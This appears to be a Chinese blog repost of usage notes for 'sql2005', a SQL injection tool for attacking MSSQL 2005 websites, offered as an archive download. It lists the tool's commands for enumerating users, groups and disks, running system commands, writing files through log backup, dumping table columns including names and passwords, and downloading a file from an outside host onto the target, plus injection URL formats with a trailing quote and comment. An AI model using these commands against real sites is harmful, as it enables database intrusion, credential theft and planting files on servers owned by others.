文章摘要
这篇文章介绍了通过SQL注入技术攻击数据库系统的方法。内容详细列举了注入过程中的关键参数,包括`sql2005`相关的子项,如`sql2005 info`、`sql2005 logbackup`等,以及一些命令,如`select @@version`和`download`。文章还提到,注入过程可以通过`GET`或`POST`请求方式访问目标URL,具体示例为`http://www.google.com/index.asp?id=1`。需要注意的是,在进行SQL注入攻击时,攻击者需要严格按照指示操作,确保参数的准确性,以避免被反向工程。
程序说明:
+========================================================================+
+ Made By tr4c3,Modified By 无敌小黄瓜【bk瞬间群】 +
+========================================================================+
————–
url.txt内容为:
————–
比如:http://www.google.com/fuck.asp?id=2
正在注入的是http://www.xxx.com/index.asp?id=1
————–
参数:
————–
sql2005 info
sql2005 logbackup
sql2005 users
sql2005 localgroups
sql2005 sqlfile
sql2005 disk
sql2005 pubs clean
sql2005 c:\1.txt mm
sql2005 turn on/off
sql2005 c:\ dir
sql2005 ver cmd
sql2005 “select @@version” query
sql2005 http://fuck.av/hacker.gif c:\1.gif download
sql2005 databases
sql2005 pubs tables
sql2005 pubs authors cols
sql2005 pubs authors au_id values
sql2005 pubs authors au_id id name pass vv
+=====================+
url内容 //注意get方式的有个?
http://www.google.com/index.asp?
id=1′
;–
GET
http://www.google.com/index.asp?
id=1′
;–
POST
sql2005.rar
© 版权声明
文章版权归作者所有,未经允许请勿转载。
